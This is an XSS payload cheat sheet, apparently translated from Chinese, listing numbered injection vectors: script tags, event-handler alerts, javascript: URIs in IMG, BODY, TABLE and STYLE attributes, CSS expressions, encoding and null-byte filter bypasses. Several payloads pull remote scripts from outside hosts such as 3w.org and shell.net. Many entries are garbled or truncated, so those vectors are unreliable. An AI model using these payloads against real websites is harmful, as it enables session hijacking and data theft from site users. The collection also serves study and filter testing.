(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab character, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab character, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective in China, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extra open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC=\'#\'" /span>

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC=\'#\'" /span>

(35) IMG LOWSRC
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC=\'#\'" /IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
expression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>